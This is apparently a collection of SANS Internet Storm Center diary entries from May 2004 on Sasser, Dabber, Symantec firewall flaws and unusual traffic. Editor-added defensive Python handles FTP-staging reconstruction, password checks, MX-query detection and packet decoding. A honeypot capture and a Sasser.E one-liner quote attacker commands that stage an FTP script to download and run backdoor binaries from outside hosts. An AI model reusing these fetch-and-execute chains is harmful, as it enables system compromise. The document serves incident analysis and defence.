A few days after Johannes Ullrich, SANS CTO, posted some of the ISC's compelling reasons why rebuilding a compromised system should be considered a best practice (for the umpteenth needed time, link below), ISC Handler Chris Carboni shared a link to a May 7th paper reciting Microsoft's reasons that can support rebuilding as a "best practice" (by Jesper M. Johansson, Security Program Manager, Microsoft Corporation). The author's take on "flattening compromised systems" and other issues is a great read and addition to the body of best practice recommendations to rebuild compromised systems.

Experience shows that rebuilding a compromised system is a best practice that some people responsible for the security of systems still want to ignore (in both *NIX & Microsoft shops). These are the folks that will have the time to read the following article ( ; ^ ). So .... if ensuring the confidentiality, integrity and availability of your employer's network, and safekeeping their business and their customers are not good enough reasons to make rebuilding a best practice for compromised systems in your shop, consider the following best practice and career advice from the Microsoft article (my highlighting);

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications). Alternatively, you could of course work on your resume instead, but I don’t want to see you doing that."
(Help: I Got Hacked. Now What Do I Do? by Jesper M. Johansson, Security Program Manager, Microsoft Corporation: May 7, 2004)


ISC's recent, needed, umpteenth and not last publication of some of the reasons why "clean up tools may not be adequate" is at;


Port 8000 activity is increasing, tip o' the hat to Ken Connelly's consistently informative Intrusions.Org Log posts;
Dshield Port 8000 Numbers;

Two sharp eyed readers correctly pointed out that these scans are more likely for HP print servers with HP Web JetAdmin vulnerabilities. We have received reports of successful exploitation of vulnerable systems.


Last Week's Internet Storm Center: Threat Update Archive is available

If you missed last weeks Internet Storm Center: Threat Update Featuring: Johannes Ullrich, Marcus Sachs and fascinating Q & A submissions ( ; ^ ), you can catch the archived briefing (audio and pdf) by logging in to your SANS Portal account;

Patrick Nolan


Published: 2004-05-15

Symantec DOS Exploit Code, Sasser Backdoor Exploit Capture, Reading Material

Exploit code for Symantec Multiple Firewall DNS Response DOS Released

Code exploiting the recently published vulnerability ( http://www.eeye.com/html/Research/Advisories/AD20040512B.html ) in some of Symantec's security products (Norton Internet Security, Norton Personal Firewall, and Norton Anti-Spam) has been posted on Bugtraq. This vulnerability does not provide a remote shell, but is a Denial-of-Service attack.

Again, if you run these products, please update them using Live Update. We predict that it's only a matter of time before we see a "Witty"-like worm in the wild.

Sasser Backdoor Exploit Honeypot Capture

LURHQ's Joe Stewart has provided the following capture of the Sasser Backdoor Exploit. This capture was of an interactive session, not an automated tool.

<snipped exploit hexdump>

mandragore bsh shellcode detected
Bind port is 9875
Binding shell on port 9875
Connection on 9875 from

C:\WINNT\system32>echo open LC0311-A.STUDENT.TCU.EDU 6789 > id
C:\WINNT\system32>echo user root root >> id
C:\WINNT\system32>echo bin >> id
C:\WINNT\system32>echo get service.exe >> id
C:\WINNT\system32>echo get mss32.dll >> id
C:\WINNT\system32>echo get sub0t.dll >> id
C:\WINNT\system32>echo get SUB0T.ini >> id
C:\WINNT\system32>echo get mshelp.exe >> id
C:\WINNT\system32>echo bye >> id
C:\WINNT\system32>ftp.exe -i -n -s:id
C:\WINNT\system32>erase id

C:\WINNT\system32>service.exe /i
C:\WINNT\system32>net start mshelp
C:\WINNT\system32>net start secman

Connection closed by peer

Selected Reading Material

For your quiet Saturday reading, posted May 2, 2004 to the SANS Reading Room, "A Security Checklist for Web Application Design," by Gail Zemanek Bayse.



Handler-on-Duty: Dave Brookshire ( dsb_AT_rlx.com )
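
The capture above shows the classic staging trick of the period: an FTP script is assembled line by line with echo redirections, handed to ftp.exe with -s:, then erased. As an added example (not from the diary and not LURHQ's tooling), the Python script below replays that echo chain into an in-memory file, parses the resulting ftp script to recover the download server, credentials and fetched binaries, and records the anti-forensic erase and the services started afterwards. The transcript it runs on is constructed to mirror the capture; the server address 203.0.113.5 is a placeholder, not the host seen in the honeypot session.

```python
"""Reconstruct an FTP-script download staged through an echo chain (added example)."""
import re

PROMPT_RE = re.compile(r"^[A-Za-z]:\\[^>]*>\s*(?P<cmd>.+)$")
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)$")
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b(?P<opts>.*)$", re.IGNORECASE)
NET_START_RE = re.compile(r"^net\s+start\s+(?P<svc>\S+)$", re.IGNORECASE)
DEL_RE = re.compile(r"^(?:erase|del)\s+(?P<file>\S+)$", re.IGNORECASE)


def commands(transcript):
    """Yield the command typed at each cmd.exe prompt line of the capture."""
    for line in transcript.splitlines():
        m = PROMPT_RE.match(line.strip())
        if m:
            yield m["cmd"].strip()


def parse_ftp_script(name, lines):
    """Interpret the reconstructed 'ftp -s:' script (open / user / get / bye)."""
    info = {"script": name, "server": None, "port": 21, "user": None,
            "password": None, "files": []}
    for ln in lines:
        words = ln.split()
        if not words:
            continue
        verb = words[0].lower()
        if verb == "open" and len(words) >= 2:
            info["server"] = words[1]
            if len(words) >= 3 and words[2].isdigit():
                info["port"] = int(words[2])
        elif verb == "user" and len(words) >= 2:
            info["user"] = words[1]
            info["password"] = words[2] if len(words) >= 3 else None
        elif verb in ("get", "recv") and len(words) >= 2:
            info["files"].append(words[1])
    return info


def reconstruct_ftp_staging(transcript):
    """Replay echo redirections in memory ('>' truncates, '>>' appends), then
    report every ftp -s:<file> that consumed one of them, whether the script
    was erased afterwards, and which services were started next."""
    files = {}
    findings = []
    for cmd in commands(transcript):
        m = ECHO_RE.match(cmd)
        if m:
            if m["op"] == ">":
                files[m["file"]] = []
            files.setdefault(m["file"], []).append(m["text"])
            continue
        m = FTP_RE.match(cmd)
        if m:
            s = re.search(r"-s:(\S+)", m["opts"])
            if s and s.group(1) in files:
                f = parse_ftp_script(s.group(1), files[s.group(1)])
                f["no_autologin"] = "-n" in m["opts"].split()   # -n: script supplies creds
                f["script_deleted"] = False
                f["services_started"] = []
                findings.append(f)
            continue
        m = DEL_RE.match(cmd)
        if m and findings and m["file"] == findings[-1]["script"]:
            findings[-1]["script_deleted"] = True
            continue
        m = NET_START_RE.match(cmd)
        if m and findings:
            findings[-1]["services_started"].append(m["svc"])
    return findings


# Constructed transcript modelled on the capture above; the FTP server address
# is a placeholder.
SAMPLE = r"""
Binding shell on port 9875
C:\WINNT\system32>echo open 203.0.113.5 6789 > id
C:\WINNT\system32>echo user root root >> id
C:\WINNT\system32>echo bin >> id
C:\WINNT\system32>echo get service.exe >> id
C:\WINNT\system32>echo get mshelp.exe >> id
C:\WINNT\system32>echo bye >> id
C:\WINNT\system32>ftp.exe -i -n -s:id
C:\WINNT\system32>erase id
C:\WINNT\system32>service.exe /i
C:\WINNT\system32>net start mshelp
C:\WINNT\system32>net start secman
Connection closed by peer
"""

if __name__ == "__main__":
    for finding in reconstruct_ftp_staging(SAMPLE):
        print(finding)
```

The recovered server, port and file list are the indicators worth blocking and hunting for on other hosts, and the erased script file is a reminder that the staging file itself will not be on disk by the time you image the box; the shell transcript or the ftp.exe process command line is where the evidence survives.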


Published: 2004-05-14

Increase in TCP 5554 activity; Fragmented IP traffic towards port 16191; Please patch your Symantec/Norton firewall products

Increase in TCP 5554 activity

Looks like there is an increase in TCP 5554 activity. This is due to public exploits against the FTP daemon installed by the Sasser worm and may be related to the "Dabber" worm covered in yesterday's diary entry. Basically, this is malware attacking malware. If you aren't infected with the Sasser worm, then you won't be infected with this.

In addition to the "Dabber" automated worm, we have reports that the exploit is being manually executed against vulnerable hosts, which is somewhat rare in these days of automated exploits and bot networks.



Fragmented IP traffic towards port 16191

We have received a report of fragmented IP traffic with source and destination ports both set to 16191. At this point, we don't have many details but would like to see if anybody else is seeing similar

Please patch your Symantec/Norton firewall products

As discussed in the diaries for the last two days, there are several vulnerabilities in Symantec/Norton firewall products. Exploit code is currently being developed. If you run these products (even behind other firewalls), you are highly urged to apply the vendor patches. You may recall the worm "Witty" attacked a similar flaw in ISS products that caused major problems for people running those products.

Download the patches here:



Remember the Witty worm:




Published: 2004-05-13

Vulnerabilities in Symantec Products, Dabber Worm, Empty .zip File Attachments

Vulnerabilities in Symantec Products. eEye Digital Security recently discovered four vulnerabilities in the Symantec Client Firewall products for Windows. If properly exploited, an attacker could render the targeted system inoperable or execute remote code with kernel-level privileges on the targeted system. Details are available from Symantec at

The eEye bulletins with complete details on the issues are at




At least one of these issues can be exploited by a single packet. Advisory AD20040512A states that, "By sending a single specially-crafted NetBIOS Name Service (UDP port 137) packet to a vulnerable host, an attacker could cause an arbitrary memory location to be overwritten with data he or she controls, leading to the execution of attacker-supplied code with kernel privileges and the absolute compromise of the target."

This puts the Internet community in the same position as we were prior to the release of the Witty worm several weeks ago. If you use any of the affected products on the list below you should immediately ensure that you have updated your software per the instructions on the Symantec link above. Affected systems include


Symantec Norton Internet Security and Professional 2002, 2003, 2004

Symantec Norton Personal Firewall 2002, 2003, 2004

Symantec Norton AntiSpam 2004


Symantec Client Firewall 5.01, 5.1.1

Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)

Dabber Worm. Joe at LURHQ notified us that they discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. According to their advisory, this worm will only infect users already infected by Sasser. They have tentatively named this worm "Dabber". Details are at

Empty .zip File Attachments. From the mailbag today we heard about multiple cases where spam emails are being received containing the conventional .zip attachment and a graphical password in the text, but opening the attachment revealed an empty .zip archive. The best theory we have is that the sender of the spam is unable to create a properly constructed .zip file, and sends a small fragment with the .zip extension. Other theories are welcome.

Marcus H. Sachs

Handler on Duty


Published: 2004-05-12

Symantec Products Vulnerabilities / Worm Password List / Mailbag-Netsky


Symantec Multiple Firewall NBNS Response Processing Stack Overflow

Update: This is just a heads up about multiple vulnerabilities found in Symantec products. Expect a more detailed explanation in tomorrow's diary.

Reference: http://www.eeye.com/html/Research/Advisories/AD20040512A.html

Worm Passwords List

Passwords are, in general, the weakest link in a corporate security strategy. In the 2003 edition of the SANS Top 20 vulnerabilities, weak passwords are listed as one major vulnerability:

Item 4.1 Description:

"Passwords, passphrases and/or security codes are used in
virtually every interaction between users and information
systems. Most forms of user authentication, as well as
file and data protection, rely heavily on user or vendor
supplied passwords. In addition, since properly
authenticated access is often not logged, or if logged not
likely to arouse suspicion, a compromised password is an
opportunity to explore a system virtually undetected. An
attacker in possession of a valid user password would
have complete access to any resources available to that
user, and would be significantly closer to being able to
access other accounts, nearby machines, and perhaps even
obtain root level access on this system. Despite this
threat, user and administrator level accounts with poor or
non-existent passwords are still very common. As well,
organizations with a well-developed and enforced password
policy are still uncommon.
The most common password vulnerabilities are: (a) user
accounts that have weak or nonexistent passwords; (b) user
accounts with widely known or openly displayed passwords;
(c) system or software created administrative level
accounts with widely known, weak, or nonexistent passwords;
and (d) weak or well known password hashing algorithms
and/or user password hashes that are stored with weak
security and are visible to anyone.
The best defense against all of these vulnerabilities is a
well developed password policy that includes: detailed
instructions for users to create strong passwords;
explicit rules for users to ensure their passwords remain
secure; a process in place for IT staff to promptly replace
weak/insecure/default or widely known passwords and
to promptly lock down inactive or close down unused
accounts; and a proactive and regular process of checking
all passwords for strength and complexity."
In today's ISC Webcast we talked about an example of a password list used by malware known as "IRCBot" to guess or brute-force passwords and gain access to systems. This list is available at:
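The regular strength check the Top 20 text above calls for, as an added example (editor's code, not an ISC or SANS tool): it tests a candidate password against a known-bad guess list and simple complexity rules at the point where a password is set. The word list is a small constructed stand-in for the IRCBot list linked above, and the 8-character minimum and three-class rule are assumptions standing in for your own policy.

```python
"""Password-policy check of the kind the SANS Top 20 text calls for.
Example added by the editor; it is not a SANS/ISC tool, and the word list
is a small constructed stand-in for the IRCBot list the diary links to."""
import re

# Constructed sample in the style of a worm/bot guess list (the real IRCBot
# list is the one linked from the diary; this is not a copy of it).
WORM_PASSWORD_LIST = [
    "", "password", "admin", "administrator", "123456", "root", "guest",
    "server", "login", "pass", "qwerty", "test",
]

MIN_LENGTH = 8      # assumed policy minimum; adjust to your own policy
MIN_CLASSES = 3     # assumed: at least three of lower/upper/digit/symbol


def in_bad_list(password, bad_list=WORM_PASSWORD_LIST):
    """True if the password matches a list entry ignoring case, since bots
    try trivial case variants as well."""
    lowered = password.lower()
    return any(lowered == entry.lower() for entry in bad_list)


def character_classes(password):
    """Count how many of the four character classes the password uses."""
    patterns = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]")
    return sum(1 for p in patterns if re.search(p, password))


def check_password(password, username=None, bad_list=WORM_PASSWORD_LIST):
    """Return the list of policy findings for a candidate password; an empty
    list means it passed every check here. Meant to run when a password is
    set or changed, which is where the plaintext is legitimately available."""
    findings = []
    if in_bad_list(password, bad_list):
        findings.append("matches a known worm/bot guess list")
    if len(password) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    if character_classes(password) < MIN_CLASSES:
        findings.append(f"uses fewer than {MIN_CLASSES} character classes")
    if username and username.lower() in password.lower():
        findings.append("contains the account name")
    return findings
```

The list comparison is deliberately case-insensitive: a guess list that contains "password" will be tried as "Password" too, so accepting the capitalized form buys nothing.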

Did you miss our monthly ISC Webcast?

Check out the Webcast archives:

Mailbag - Netsky
We received a report from a user who had been seeing a large number of DNS queries from a small set of his high speed customers. The answer, as pointed out by Rick Wanner, was that it was caused by NetSky. In his words: "...I didn't
realize that the deciding factor for what is an email
address is anything with an "@" sign in the name, or
contents would be tried as an email address. So people
with big Internet caches, and who don't clean up their
cookies were generating thousands of MX requests per minute
to their default DNS server."
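One way to spot this symptom on the resolver side, as an added example rather than anything from the report above: count MX queries per client per minute in the DNS query log and flag clients over a threshold. The log lines are constructed in a simplified BIND-style layout, and the threshold is an assumption to tune against your own baseline; the real infections generated thousands of MX requests per minute, so the sample is scaled down.

```python
"""Flag DNS clients that issue bursts of MX queries, the symptom in the
mailbag report. Example added by the editor, not ISC code; the log lines are
constructed in a simplified BIND-style query-log layout."""
import re
from collections import defaultdict

# "<date> <HH:MM>:<SS>.<ms> client <ip>#<port>: query: <name> IN <type>"
LINE_RE = re.compile(
    r"^(?P<minute>\S+ \d\d:\d\d):\d\d\.\d+ client (?P<ip>[\d.]+)#\d+: "
    r"query: (?P<name>\S+) IN (?P<qtype>[A-Z]+)"
)


def mx_queries_per_minute(lines):
    """Map (client ip, minute) -> number of MX queries in that minute."""
    counts = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if m and m.group("qtype") == "MX":
            counts[(m.group("ip"), m.group("minute"))] += 1
    return dict(counts)


def suspicious_clients(lines, threshold):
    """Clients that reach `threshold` MX queries in any single minute. An
    ordinary workstation has no reason to resolve MX records at all; a mail
    server does, so exclude your own mail hosts before acting on the result."""
    hits = {ip for (ip, _minute), n in mx_queries_per_minute(lines).items()
            if n >= threshold}
    return sorted(hits)


def build_sample_log():
    """Constructed sample: one host querying MX for many unrelated names
    (the harvested '@' strings the report describes) plus normal traffic."""
    burst = [
        f"12-May-2004 10:15:{i:02d}.000 client 10.1.2.3#1034: "
        f"query: host{i}.example IN MX"
        for i in range(30)
    ]
    normal = [
        "12-May-2004 10:15:05.000 client 10.1.2.9#2001: query: www.example IN A",
        "12-May-2004 10:15:06.000 client 10.1.2.9#2001: query: example IN MX",
        "12-May-2004 10:16:07.000 client 10.1.2.3#1034: query: www.example IN A",
    ]
    return burst + normal
```

Bucketing by minute rather than by hour keeps a short burst visible instead of averaging it away; a host that sends mail directly (bypassing its ISP's relay) is exactly what a mass mailer looks like from the resolver.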

Handler on duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-05-11

May Microsoft Patches Available

Microsoft posted a single security update as part of their regularly scheduled "Second Tuesday of the Month" release. MS04-015, "Vulnerability in Help and Support Center Could Allow Remote Code Execution (840374)" patches an existing vulnerability in the "Help and Support Center" as found in Windows XP and Windows Server 2003.

Because of the way it handles certain "HCP" URLs, the Help and Support Center is vulnerable to remote code execution. A malicious HCP URL could exploit the vulnerability; the attacker would only need to convince a user to click on a link to the malicious code. Exploiting this vulnerability could allow an attacker to take complete control of an affected system.

According to Microsoft, this issue is rated only as "Important" because they believe that "significant user interaction is required" to exploit the vulnerability.

Further information can be found at:


Also, for more information on the impact of this patch, as well as an update on the latest threats to our networks, join us for the monthly ISC Threat Update webcast, Wednesday, May 12 at 2:00 PM EDT (1800 UTC).

For more information:



Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-05-10

New Sasser Worm FTP exploit and Java DOS

We received a submission of an exploit for Sasser's FTP server. It appears to be a buffer overflow targeting port 5554 by default. If successful it will spawn a shell. The published exploit code lists the shell listening on port 5300. We are seeing code in the wild using port 53 for the shell.

Sun announced on May 6 a DoS vulnerability in the JRE which may allow a remote unprivileged user to cause the Java Virtual Machine to become unresponsive.

The announcement: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57555

SDK and JRE releases are available at: http://java.sun.com/j2se/

SDK and JRE 1.4.2_03 or earlier 1.4.2 releases are affected.

Dan Goldberg Dan at MADJiC dot net


Published: 2004-05-09

Happy Mother's Day

Happy Mother's Day to wonderful Moms all over the world from the SANS handlers.


Published: 2004-05-08

Author of Sasser worm and Phatbot caught; New Sasser Worm Variant; SANS Security Newsletters and Digests

Author of Sasser worm and Phatbot caught

Several news outlets have reported that the author of the Sasser worm has been caught in Germany. Check this out at:



http://www.lka.niedersachsen.de/aktuelles/archiv/2004/sasser_080504.htm (German)

In a Microsoft Press Release, Microsoft says that they will hold a teleconference about this arrest:

Another piece of news also reported that Phatbot creator has been hunted down too:

http://www.heise.de/newsticker/meldung/47209 (German)

New Sasser Worm Variant

We received a submission from Duda that he has detected a possible new Sasser worm variant infection via port 1023 instead of the usual port 5554. If you have seen this, please let us know.

echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp
&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on

According to the McAfee writeup, this is the Sasser.E variant and it matches the ports used:

* It creates a remote shell on TCP port 1022 rather than 9995 or 9996

* It uses FTP on TCP port 1023 instead of 5554


SANS Security Newsletters and Digests

Too much news to catch up on? SANS provides weekly security newsletters and digests, which let you keep up even if you are not able to track security news every day. Over the weekend, take a look and sign up for the free newsletters and digests.



Published: 2004-05-07

Odd Packets

From the front line

A number of sites have been seeing unusual SYN-ACK traffic coming from port 80,
that at first glance appears to be backscatter from a DDoS attack. A closer look
leaves us slightly puzzled. Note: these logs have been sanitized to protect the
guilty and the innocent.

11:57:58.477497 IP (tos 0x0, ttl 112, id 32814, offset 0, flags [DF], length: 40) > S [tcp sum ok]
2030205186:2030205186(0) ack 25686 win 65535
4500 0028 802e 4000 7006 1ad7 0a0a 0a67
c0a8 9ab1 0050 a18f 7902 7902 0000 6456
5b12 ffff 3ccd 0000 0000 0000 0000
12:09:05.651825 IP (tos 0x0, ttl 112, id 23183, offset 0, flags [DF], length: 40) > SE [tcp sum ok]
1244547630:1244547630(0) ack 36086 win 65535
4500 0028 5a8f 4000 7006 4076 0a0a 0a67
c0a8 9ab1 0050 6c7c 4a2e 4a2e 0000 8cf6
5652 ffff aba8 0000 0000 0000 0000
12:45:12.480408 IP (tos 0x0, ttl 112, id 11525, offset 0, flags [DF], length: 40) > SW [tcp sum ok]
1565220171:1565220171(0) ack 35766 win 65535
4500 0028 2d05 4000 7006 6e00 0a0a 0a67
c0a8 9ab1 0050 4cbf 5d4b 5d4b 0000 8bb6
5092 ffff ac2b 0000 0000 0000 0000

Some unusual patterns that a number of us have picked up on from the traffic:

- Different combinations of the TCP reserved / ECN (Explicit Congestion
Notification) flags set. If these were valid ECN SYN-ACKS, they would have
only the SYN, ACK, and ECN-ECHO flags set.

- The TCP Window size is maxed out on all the packets

- Sequence numbers have definite pattern of repeating 2 bytes
(4 hex characters), examples:

Seq: 0x79027902

Seq: 0x4a2e4a2e

Seq: 0x5d4b5d4b

This is unusual, as these sequence numbers are coming from a host that initially
you assume is suffering a DDoS attack. Has anyone seen this traffic? Got packets?
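To make the checks above repeatable, here is an added example (editor's code, not from the diary) that decodes the three hex dumps quoted above, recomputes the IP header checksum that tcpdump reported as ok, and applies the handlers' three observations: reserved/ECN bits, a 65535 window, and sequence numbers whose 16-bit halves repeat. The only input is the hex from the dumps, which the ISC already sanitized.

```python
"""Decode the three sanitized SYN-ACK hex dumps from the diary and apply the
handlers' anomaly checks. Editor-added example; not ISC code."""
import struct

# Copied from the diary's hex dumps (ISC sanitized the addresses before
# publication; the tcpdump summary lines are not needed here).
PACKETS = [
    "4500 0028 802e 4000 7006 1ad7 0a0a 0a67 c0a8 9ab1 0050 a18f 7902 7902 "
    "0000 6456 5b12 ffff 3ccd 0000 0000 0000 0000",
    "4500 0028 5a8f 4000 7006 4076 0a0a 0a67 c0a8 9ab1 0050 6c7c 4a2e 4a2e "
    "0000 8cf6 5652 ffff aba8 0000 0000 0000 0000",
    "4500 0028 2d05 4000 7006 6e00 0a0a 0a67 c0a8 9ab1 0050 4cbf 5d4b 5d4b "
    "0000 8bb6 5092 ffff ac2b 0000 0000 0000 0000",
]

# TCP flag byte, tcpdump letters: W=CWR, E=ECE, S=SYN, etc.
FLAG_BITS = [("CWR", 0x80), ("ECE", 0x40), ("URG", 0x20), ("ACK", 0x10),
             ("PSH", 0x08), ("RST", 0x04), ("SYN", 0x02), ("FIN", 0x01)]


def ip_header_checksum_ok(raw, ihl):
    """One's-complement sum over the header including its checksum field
    must fold to 0xFFFF if the stored checksum is correct."""
    total = 0
    for i in range(0, ihl, 2):
        total += (raw[i] << 8) | raw[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF


def parse_packet(hexdump):
    """Parse an IPv4/TCP header pair out of a tcpdump -x style hex dump."""
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    ttl, proto = raw[8], raw[9]
    if proto != 6:
        raise ValueError("not a TCP packet")
    tcp = raw[ihl:total_len]            # bytes past total_len are link-layer padding
    sport, dport, seq, ack, offset_byte, flags, window = struct.unpack(
        "!HHIIBBH", tcp[:16])
    return {
        "ttl": ttl, "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "data_offset": (offset_byte >> 4) * 4,
        "reserved": offset_byte & 0x0F,  # the 4 bits between data offset and the flag byte
        "flags": flags,
        "flag_names": [name for name, bit in FLAG_BITS if flags & bit],
        "window": window,
        "ip_checksum_ok": ip_header_checksum_ok(raw, ihl),
        "padding": len(raw) - total_len,
    }


def seq_halves_repeat(seq):
    """The 'repeating 2 bytes' pattern: high and low 16 bits are equal."""
    return (seq >> 16) == (seq & 0xFFFF)


def anomalies(pkt):
    """The handlers' observations, as checks on one parsed packet."""
    found = []
    if pkt["reserved"]:
        found.append("reserved bits set")
    is_synack = (pkt["flags"] & 0x12) == 0x12
    if is_synack and pkt["flags"] & 0xAD:   # anything but SYN, ACK, ECE
        found.append("flags beyond SYN/ACK/ECE on a SYN-ACK")
    if pkt["window"] == 0xFFFF:
        found.append("window maxed at 65535")
    if seq_halves_repeat(pkt["seq"]):
        found.append("sequence number repeats 16-bit halves")
    return found
```

Each dump is 46 bytes although the IP total length is 40: the trailing six zero bytes are Ethernet frame padding, which is why the parser slices on total length rather than trusting the dump's end. A genuine ECN-capable SYN-ACK sets only ECE alongside SYN and ACK, so the third packet's CWR and the first two packets' non-zero reserved nibble are both outside what a real stack emits.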

Handler on Duty: Mike Poor <mike .at. intelguardians.com>


Published: 2004-05-06

/ Reading Logs / More Phishing / TCP 135, Welchia and Lovgate / Sasser slowing / Egress Filtering and You /

Reading Your Logs Pays Off

Chas Tomlin, a sysadmin and programmer for the University of Southampton, noticed some odd entries in his web logs and forwarded them to the ISC for analysis. Examination showed that an attack based on the do_brk exploit ( http://secunia.com/advisories/10328/ ) was attempted and failed. Systems shown to be vulnerable to this attack have the following kernels:

2.4.20-18.9 as shipped with RedHat 9.0

2.4.22 (vanilla)

2.4.22 with grsecurity patch

Please make sure your systems are patched and/or upgraded as needed.

Another eBay Phishing Scam

Anthony Congiano, a helpdesk administrator, alerted the ISC earlier today to another attempt at phishing information from eBay users. The e-mail in question tells the recipient that their account has been used "to make fake bids" and that "you are required to verify your eBay account by following the link below." The scam is designed to collect eBay member names, user names, passwords and credit card information. eBay and the web host have been notified.

Port 135 Spikes, Lovgate and Welchia

The traffic pattern on port 135(TCP) noted in yesterday's diary entry continues today but appears to have diminished in intensity. Packet captures in affected areas have shown an RPC DCOM attack which is one of the vectors for infection for the new Lovgate and Welchia variants identified yesterday. There are additional methods of infection for both worms.

Fixes for the vulnerabilities exploited by Welchia and Lovgate were made available in 2003. Multiple worms and bots are currently scanning for these vulnerabilities.


McAfee: http://vil.nai.com/vil/content/v_101157.htm


Trend Micro:

Sasser also seems to be slowing down as systems are patched and anti-virus updates are applied. For some interesting reading on Sasser's effects, look at these pages:

Further Reading

If you are not familiar with egress filtering, take a look at SANS instructor Chris Brenton's paper on the subject at:
and find out how you can make your network less appealing to would-be attackers.


Chris Carboni - chris.carboni_at_verizon.net


Published: 2004-05-05

port 135 spikes, Lovegate, Welchia.K, Mailbag, Unix Security

Port 135 Spikes

Over the last few days, a number of networks detected a sharp, almost vertical,
rise in port 135 (tcp) traffic and a subsequent exponential decay. Typically,
these traffic bursts last for a few hours. From selected packet captures, it
looks like these scans attempt to exploit the RPC DCOM vulnerability. Several
possible sources have been suggested. It is likely that these scans are caused
by botnets which are scanning given target networks for new, vulnerable hosts.

Lovgate Virus

A virus sample submitted to us on Monday is now identified as LovGate.R.
In addition to spreading via e-mail, the virus uses the RPC DCOM
vulnerability to spread and it will open file shares on infected systems.
This virus is one suspected cause of the rise in port 135 traffic.

McAfee: http://vil.nai.com/vil/content/v_101157.htm

Symantec: http://securityresponse.symantec.com/avcenter/venc/data/w32.lovgate.r@mm.html

Welchia.K Worm

A new version of 'welchia' (aka Nachi) has been identified. This worm, which was first identified in the wake of Blaster last August, is most noted for the ICMP echo requests that it sends. Welchia.K includes exploits for the following vulnerabilities:

* RPC Locator

* WebDAV (you will see URLs that start with 'SEARCH' in your web log)


* MS Workstation

Fixes for all these vulnerabilities were made available in 2003. Multiple worms and bots are currently scanning for these vulnerabilities.

Trend Micro: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.K

Mailbag: Cleanup Woes

A reader asked why we recommend a complete rebuild of systems infected with 'sasser', given that 'sasser' is rather benign and easy to clean.

The problem with 'sasser' is that it is an indicator exploit. The fact that you
are infected with 'sasser' indicates that you were vulnerable to the LSASS
exploit. Before sasser, a large number of bot variants exploited this same vulnerability. We find that many systems infected with 'sasser' are infected with one or more bots in addition to 'sasser'.

Each day, we receive several distinct 'bot' samples. Antivirus signatures are typically not able to keep up with all versions, and many 'bots' include specific code to plant backdoors, disable firewalls and antivirus products, or to add additional system accounts.

Antivirus software is not able to reliably detect and clean all of these bots. As a result, it is impossible to tell if any of these bots are left on your system. Only a thorough (and costly) forensics analysis by a trained specialist will provide some assurance.

As a result, if you are infected by 'sasser', try to rebuild your system from scratch. For detailed instructions on setting up a new system safely, see
http://www.sans.org/rr/papers/index.php?id=1298 (Windows XP: Surviving the first day). If you acquire a new system, assume it is not yet patched and use
extreme care the first time you connect it to the network.

Reading Room Recommendation

Given all the Windows security news, don't neglect your UNIX / Linux systems.
You may either want to consult the Center for Internet Security's benchmarks ( http://www.cisecurity.org ) or, for a quick checkup, see fellow handler Bill Stearns' paper: http://www.sans.org/rr/special/essential_host_security.php

Johannes Ullrich, jullrich_AT_sans.org


Published: 2004-05-04

Back to Green / Previous Sasser Traffic Analysis / Phatbot Source Code / Netsky.AC / CheckPoint VPN-1 Vulnerability

Back to Green

Yes...we are back to green. Things are quite calm, there is no new version of Sasser and no significant impact is being observed.
Some numbers about Sasser:

According to Microsoft, 1.5 million users downloaded the cleanup tool via Windows Update.

The Internet Storm Center numbers are close to Microsoft:

- 500k on May 1st

- 700k on May 2nd

Previous Sasser Traffic Analysis

After an analysis performed by our handlers (Tom Liston, Lorna Hutcheson and Toby Kohlenberg), we have a reliable indication that there were some attempts to include the HOD LSASS exploit code published by SecurityLab on April 29 in the Agobot worm. We believe that some tests were being done over the Internet using a zombie network with some code modifications, and that some people may have confused it with the real Sasser worm.

Phatbot Source Code

After some rumors about the Phatbot source code, it was made available today in a post to some mailing lists. The pack includes not only the source code but also documentation and some HTML FAQs. More variants are expected.

Netsky.AC

The Sasser 'fix' hoax email, reported yesterday in the Handler's Diary, is the latest variation of the Netsky virus, which tries to deliver itself as a supposed tool to fix the Sasser worm (also Netsky.AB, Beagle.AB, Mydoom.F and MSBlast.B).

Reference: http://isc.sans.org/diary.php?date=2004-05-03

VPN-1 Vulnerability

Check Point just released an advisory about a vulnerability in ISAKMP that affects the Check Point VPN-1 product.

According to the advisory, the ISAKMP vulnerability may affect VPN-1 during "negotiations of a VPN tunnel which may cause a buffer overrun, potentially compromising the gateway."

Check Point recommends that customers install an update on all enforcement modules.

Reference: http://www.checkpoint.com/techsupport/alerts/ike_vpn.html

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-05-03

Update: Sasser.d to start the work week, clean up tools may not be adequate

Due to the continuing spread of Sasser and the other malicious code targeting the MS04-011 vulnerabilities, we will remain at Infocon Yellow overnight. We will reevaluate the situation in the morning.

Sasser worm family continues to spread

